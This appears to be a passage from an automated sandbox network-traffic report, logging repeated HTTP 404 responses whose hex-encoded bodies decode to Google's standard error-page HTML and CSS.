6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1571Date: Sun, 01 Dec 2024 21:52:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
